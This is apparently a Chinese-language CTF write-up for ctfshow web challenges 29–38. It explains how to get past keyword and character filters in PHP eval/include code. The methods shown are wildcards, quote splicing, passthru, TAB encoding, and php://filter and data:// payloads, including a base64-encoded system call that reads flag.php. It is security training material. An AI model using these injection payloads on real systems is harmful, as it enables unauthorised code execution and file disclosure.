ctfshow web29-38(命令执行)

温故而知新，复盘时尝试不同方法，弄懂原理！

29.

 审计代码，发现eval()函数，作用是将其中的内容当做php代码进行执行，再看条件，

!preg_match("/flag/i",$c),变量是c，不匹配大小写的flag就行，其正则表达式为：/flag/i，该函数表示从我们构造的ip的值中匹配flag字符串,

正则表达式中"/"是表达式开始和结束的标记（即匹配了flag）且其后的"i"标记这是一个大小写不敏感的搜索,即flag中字母的大写和小写的组合都会被匹配到

本题中的正则表达式未涉及许多的正则表达式的元字符，例如还有一些其他常见的类型题目如正则表达式（/^\w+$/）在表达式开始和结束的标记中间的

^匹配输入字行首；

\w 匹配包括下划线的任何单词字符；

+匹配前面的子表达式一次或多次(大于等于1次）；

$匹配输入行尾

总体意义就是限定一个任意长字符串，全部由字母数字下划线组成，前面中间后面都不能有空格、标点等非\w字符

那flag通常在flag.php,flag.txt内，我们需要读取文件，常用命令nl,cat,tac,more,sort

cat  flag.php  ,  nl [选项]  flag.php，tac是cat的反向输出  tac flag.php,

more [选项]【flie】 more flag.php

sort [选项] flag.php

我们一般将代码执行漏洞转换为命令执行漏洞，常借助system()函数,''

再用通配符、拼接等方式绕过flag的屏蔽

fl''ag,  fla?.php,fla*

?c=system('cat fla*');  ?c=system('cat fla""g.php');  注意：;不能少，拼接的符号不要与括号内的相同，单引号配双引号。

还可以使用echo配合''（详）

cat不会显示，但是f12可以看到

 

30.

 多屏蔽了system,那么使用其他的php命令执行函数,可以用passthru($cmd),shell_exec($cmd)

?c=passthru('more fla*');

shell_exec()在此处似乎没用 ，反撇号//（shell_exec() 函数实际上仅是反撇号 (`) 操作符的变体）

31.

多屏蔽了cat、sort，单引号和空格，单引号换双引号，空格用TAB替换，TAB的URL编码是%09 

?c=passthru("more%09fla*");

无参数函数的写法（还不会）

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

32.

括号都去了，只能考虑Php伪协议

?c=include$_GET[“url”]?>&url=php://filter/read=convert.base64- encode/resource=flag.php

过滤了分号，那么可以直接?>闭合php,因为php语法中，最后一句php代码可以不闭合（这里有一点要说一下，?>闭合的是eval里面的php语句，eval后续还有语句的话，依旧是会执行的）；

这里实际是传了两个参数，第一个是c,受题目限制，但是c的实际内容是第二个参数Url的内容，url不受限制。

file:// 访问本地文件系统
http:// 访问 HTTPs 网址
ftp:// 访问 ftp URL
php:// 访问输入输出流
zlib:// 压缩流
data:// 数据
ssh2:// security shell2
expect:// 处理交互式的流
glob:// 查找匹配的文件路径

• php://filter，作用：一种元封装器，设计用于数据流打开时的筛选过滤应用，类似 readfile()、file() 和 file_get_contents()，在数据流内容读取之前没有机会应用其他过滤器。
• resource=<要过滤的数据流>
• read=<读链的过滤器>可以设定一个或多个过滤器的名称，以管道符分隔
• convert.base64-encode属于转换过滤器，base64编码
• /resource=文件名 读取文件源码
• include属于文件包含函数，include$_GET[“url”] 等同于， $file=$_GET[“url”];
• 造成文件包含的函数，除Include外，还有require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile

php伪协议详解看大佬：web安全——伪协议_ephemeral-fever的博客-CSDN博客_伪协议是什么

最后出来的是Base64编码的结果。

33.

多屏蔽了双引号，写法同上，GET[]处可以不加引号，Include可以换require

?c=require$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 

34.

过滤了:号，但是并不影响第二个参数

因为?c=include$_GET[a]?>

35. 

 多过滤了=和<,还是不影响

36.

多过滤了数字，仍不影响

37. 

直接有include()函数，如果要执行只需要文件名即可，或者直接注入php代码

data需满足allow_url_fopen，allow_url_include同时开启才能使用，使用如下：

file.php?file=data://text/plain,<?php phpinfo()?>

 ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

<?php system('cat flag.php');?>

data://text/plain协议

此协议需要在双on的情况下才能使用，很常用的数据流构造器，将读取后面base编码字符串后解码的数据作为数据流的输入

38.

 增加了屏蔽字符串，但对data伪协议的base64编码无效，仍是上题方法